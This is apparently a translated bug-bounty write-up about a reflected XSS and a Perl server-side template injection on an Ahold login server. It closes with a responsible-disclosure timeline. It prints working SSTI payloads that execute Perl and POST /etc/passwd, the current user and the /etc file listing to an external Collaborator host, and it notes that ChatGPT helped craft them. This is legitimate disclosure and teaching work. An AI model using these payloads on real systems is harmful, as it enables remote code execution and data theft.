我们可以将有效负载设置为一些XSS有效负载，并接管任何我们可以诱骗访问我们特定URL的用户的浏览器会话。一个快速的方法是创建一个好的有效负载：12345，返回Repeater并将&version=12345添加到请求中。在请求窗口中右键单击，选择Engagement Tools -> Generate CSRF PoC。

现在Burp为你创建一个工作的PoC，你可以用它来触发漏洞，将HTML上传到某个Web服务器，诱使受害者打开该网站，漏洞就会执行。

但是，如果我们能利用这个反射漏洞做更多事情呢？每当你遇到反射型XSS漏洞时，你还应该检查服务器端模板注入漏洞。这些漏洞的影响通常更高，因为它们允许你在服务器上执行代码，这反映在源代码中。

将Jonathan Bouman的故事加入你的收件箱。 免费加入Medium以获取此作者的更新。 订阅 订阅

由于我们知道端点运行Perl（记住URL中的扩展名），我们现在只扫描与Perl相关的代码注入。

首先在Burp中创建一个新的Live Task，转到Dashboard并点击那个橙色按钮。

现在选择列表中的所有项目（Ctrl + A）并右键单击，按下Enabled。这实质上禁用了它将执行的所有其他扫描，这是减少噪音和服务器请求的好方法。现在搜索Perl并选择Perl Code injection选项。按下保存，你就可以扫描代码注入了！

现在回到带有我们反映的version参数的repeater。现在选择我们的XSS有效负载的值并按下Save。

现在是时候喝点咖啡（或一些好茶），看看Burp Active Scanner是否能找到代码注入漏洞。奖励：检查Burp中的Logger选项卡，了解Burp使用哪些有效负载。

所以我们现在有一个请求，通过注入有效负载{${sleep(lc(20))}}让服务器睡眠20秒。

我们可以通过将请求发送到repeater（打开Request选项卡，在请求上右键并发送到repeater，在repeater中重新发送请求并看到加载需要20秒）来轻松确认这一点。

由于sleep(20)作为有效负载很无聊，并且对非技术人员没有显示实际影响，我们需要创建一些有效负载，实际显示我们可以在服务器上执行任何代码。

这需要时间和责任（不要破坏东西并保持比例）。只要确保公司领导理解该漏洞确实是CVSS 10分，但不要通过泄露所有用户数据来做到这一点。

我经常做的是尝试证明我可以运行任何代码并将/etc/passwd文件泄露到外部（攻击者控制的）服务器。此文件不包含真实密码，但包含内部服务器信息。外部服务器可以是Burp Collaborator（或者甚至是你自己的私有Collaborator）。

经过2小时的尝试，我想出了以下泄露/etc/passwd文件的有效负载：

1

version=${exec(‘perl -MMIME::Base64 -MLWP::UserAgent -e \’my $ua %3d LWP::UserAgent->new;my $response %3d $ua->post(\”http://1dfct18y9z1fai91sjr25xngn7tyhx5m.oastify.com\",Content_Type %3d> \”form-data\”, Content %3d> [file %3d> [\”/etc/passwd\”]]);\’’)}

让我解释一下它的作用：

• Perl代码执行：${exec(’…’)}中的有效负载是Perl代码，经过URL编码以确保通过HTTP正确传输。如果服务器容易受到SSTI攻击，它会解释并执行此代码。
• LWP::UserAgent模块：此Perl模块允许代码发出HTTP请求。my $ua = LWP::UserAgent->new;部分创建一个新的用户代理对象，能够发送HTTP POST请求。
• 发出POST请求：$ua->post(…)函数向指定的URL发送POST请求，其中包含/etc/passwd文件的内容。这是攻击者的常见目标，因为它包含用户帐户信息。

有人可能认为“先生，你需要广泛的Perl知识才能做到这一点”。错了！

我尝试了所有这些选项，第三个（在将jo.ax.com域替换为我们的burp collaborator url之后）触发了一个传入的DNS请求。解析域名通常是发现你是否在服务器上具有某些代码执行的最快方法。只需在Burp Collaborator中监视任何传入的DNS请求！

之后，就是给ChatGPT 4正确的提示来创建一个实际泄露/etc/passwd文件的有效负载的问题。

奖励有效负载

获取执行perl进程的当前linux用户（’nobody’）：

1

ssn=1234&mmdd=1234&name=asdadaw&login-form-type=initial_entry&version=${exec(‘perl -MMIME::Base64 -MLWP::UserAgent -e \’my $ua %3d LWP::UserAgent->new; my $user %3d getpwuid($<);my $response %3d $ua->post(\”http://1dfct18y9z1fai91sjr25xngn7tyhx5m.oastify.com\",Content_Type %3d> \”form-data\”, Content %3d> $user);\’’)}

显示/etc/的目录内容（一长串文件和备份文件）：

1

ssn=1234&mmdd=1234&name=asdadaw&login-form-type=initial_entry&version=${exec('perl -MMIME::Base64 -MLWP::UserAgent -e \'my $ua %3d LWP::UserAgent->new;opendir(DIR,\"/etc/\");my @files %3d readdir(DIR); closedir(DIR);my $response %3d $ua->post(\"http://1dfct18y9z1fai91sjr25xngn7tyhx5m.oastify.com\",Content_Type %3d> \"form-data\", Content %3d> join(\"\n\", @files));\'')}

结论

我们今天证明了我们可以完全攻陷ws1.aholdusa.com服务器。一个身份管理系统/LDAP服务器。我在3.5年前发现了这个漏洞，但它很可能自2005年12月15日起就存在。

使用此服务器的所有用户/员工/客户/供应商的数据应被视为已泄露，因为我们证明了完整的远程代码执行能力，并且能够建立到我们自己服务器的出站连接。

无法知道服务器是否未被恶意行为者攻陷，因为这需要广泛的日志。在这种情况下，日志需要包含POST正文值。在这个应用程序中，你会不惜一切代价避免这种情况，因为这也会以纯文本形式泄露用户名和密码（记住受影响的端点用于用户登录）。此外，这些日志需要追溯到18年前，以证明此漏洞从未被利用过。

时间线

• 2020年4月23日 — 向Ahold安全团队报告了该漏洞，见下文电子邮件。
• 2020年4月23日 — Ahold确认了该漏洞，承诺随时告知我。
• 2023年11月2日 — Ahold请求我确认漏洞修复并提供已修复的证据
• 2023年11月6日 — Ahold再次发送电子邮件请求我确认漏洞已修复（我没有时间更快回复）
• 2023年11月6日 — 回复我对漏洞为何没有更快修复感到惊讶，请求有关信息，并承诺他们检查是否已修复。
• 2023年11月9日 — 确认漏洞仍然存在，创建了一个完整的RCE有效负载并写了这篇博客。与安全团队分享。请求在30天内负责任地披露，因为可能有很多员工的凭证因此漏洞而泄露。
• 2023年11月9日 — 告知Ahold Delhaize数据保护官此报告的存在，因为这影响了大量员工。
• 2023年11月10日 — Ahold请求我的Paypal以发送奖励。
• 2023年11月13日 — Ahold奖励此漏洞300欧元
• 2023年11月13日 — 端点仍然易受攻击，通过电话联系Ahold Delhaize的隐私官分享我的担忧并请求将此报告升级。
• 2023年11月15日 — Ahold通知我端点已修复。然而经过一些测试；端点并未修复。当使用GET HTTP方法请求端点时，它仅重定向到404。漏洞利用仍然有效，因为漏洞利用使用POST HTTP方法。添加了两个新的有效负载（检查当前用户；nobody和/etc/中的文件列表）。通过电子邮件向Ahold发送了我的反馈和担忧。
• 2023年11月17日 — 端点仍然易受攻击
• 2023年11月20日 — Ahold通知我漏洞已解决。我确认了修复。请求披露此报告，向Ahold提供机会在报告中添加他们自己的段落。
• 2023年11月27日 — 对披露请求没有回复，发送了提醒。Ahold回复需要更多时间。
• 2023年12月7日 — 请求更新
• 2023年12月8日 — Ahold通知我经过内部辩论，他们不想使用添加段落的机会。
• 2023年12月14日 — 披露了上述报告